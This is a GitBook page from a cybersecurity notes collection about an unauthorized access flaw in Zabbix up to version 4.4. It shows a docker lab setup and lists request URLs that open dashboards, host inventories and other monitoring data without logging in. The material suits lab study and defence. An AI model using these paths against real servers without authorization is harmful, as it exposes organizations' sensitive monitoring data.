🤣
CybersecurityNote
  • Foreword
  • References.md
    • References
    • attackdefense
    • Domain Environment
    • HTB
    • Red Team Range
    • tryhackme
    • vulnhub
  • Security Certificates
    • CISSP
    • CRTO
      • Exam experience sharing
    • OSCP
      • Exam experience sharing
  • Security Testing
    • Lateral Movement
      • AS-REP Roasting Attack
      • Kerberoasting Attack
  • Security Vulnerability
    • application Vulnerability
    • Linux Privilege Escalation Vulnerability
    • Linux Vulnerability
    • unauthorized vulnerability
      • ActiveMQ Unauthorized Access Vulnerability
      • Apache Flink Unauthorized Access Vulnerability
      • Atlassian Crowd Unauthorized Access Vulnerability
      • CouchDB Unauthorized Access Vulnerability
      • Docker Unauthorized Access Vulnerability
      • Dubbo Unauthorized Access Vulnerability
      • Jenkins Unauthorized Access Vulnerability
      • Jupyter Notebook Unauthorized Access Vulnerability
      • MongoDB Unauthorized Access Vulnerability
      • RabbitMQ Unauthorized Access Vulnerability
      • Spring Cloud Gateway Server Unauthorized Access Vulnerability
      • SpringBoot Actuator Unauthorized Access Vulnerability
      • Unauthorized Access to Kubernetes API Server
      • Unauthorized Access Vulnerability in Clickhouse
      • Unauthorized Access Vulnerability in Druid Monitoring Page
      • Unauthorized Access Vulnerability in Hadoop YARN Resourcemanager
      • Unauthorized Access Vulnerability in Hadoop Yarn RPC
      • Unauthorized Access Vulnerability in InfluxDB API
      • Unauthorized Access Vulnerability in JBoss
      • Unauthorized Access Vulnerability in Kafka Manager
      • Unauthorized Access Vulnerability in Kibana
      • Unauthorized Access Vulnerability in Kong
      • Unauthorized Access Vulnerability in LDAP
      • Unauthorized Access Vulnerability in Memcached
      • Unauthorized Access Vulnerability in NFS
      • Unauthorized Access Vulnerability in Redis
      • Unauthorized Access Vulnerability in Rsync
      • Unauthorized Access Vulnerability in Spark
      • Unauthorized Access Vulnerability in VNC Server
      • Unauthorized Access Vulnerability in Weblogic
      • Unauthorized Access Vulnerability in ZooKeeper
      • Zabbix Unauthorized Access Vulnerability
    • Windows Privilege Escalation Vulnerability
    • Windows Vulnerability
Powered by GitBook
On this page
  • Vulnerability Description
  • Affected Versions
  • Environment Setup
  • Exploitation
  1. Security Vulnerability
  2. unauthorized vulnerability

Zabbix Unauthorized Access Vulnerability

PreviousUnauthorized Access Vulnerability in ZooKeeperNextWindows Privilege Escalation Vulnerability

Last updated 2 years ago

Vulnerability Description

There is an unauthorized access vulnerability in Zabbix, through which the attacker can access the data on the Zabbix server without authorization, leading to the leak of sensitive information.

Affected Versions

Zabbix <= 4.4

Environment Setup

docker run -p 10051:10051  -p 80:80 zabbix/zabbix-appliance:ubuntu-4.0.12

Exploitation

Access: http://192.168.32.183/zabbix.php?action=problem.view&ddreset=1

Access: http://192.168.32.183/overview.php?ddreset=1

Access: http://192.168.32.183/latest.php?ddreset=1

The following links can also be accessed:

  • https://TARGET/zabbix/zabbix.php?action=dashboard.view

  • https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1

  • https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1

  • https://TARGET/zabbix/overview.php?ddreset=1

  • https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1

  • https://TARGET/zabbix/latest.php?ddreset=1

  • https://TARGET/zabbix/charts.php?ddreset=1

  • https://TARGET/zabbix/screens.php?ddreset=1

  • https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1

  • https://TARGET/zabbix/srv_status.php?ddreset=1

  • https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1

  • https://TARGET/zabbix/hostinventories.php?ddreset=1

  • https://TARGET/zabbix/report2.php?ddreset=1

  • https://TARGET/zabbix/toptriggers.php?ddreset=1

  • https://TARGET/zabbix/zabbix.php?action=dashboard.list

  • https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1

image-20220726150813375
image-20220726150910028
image-20220726150855422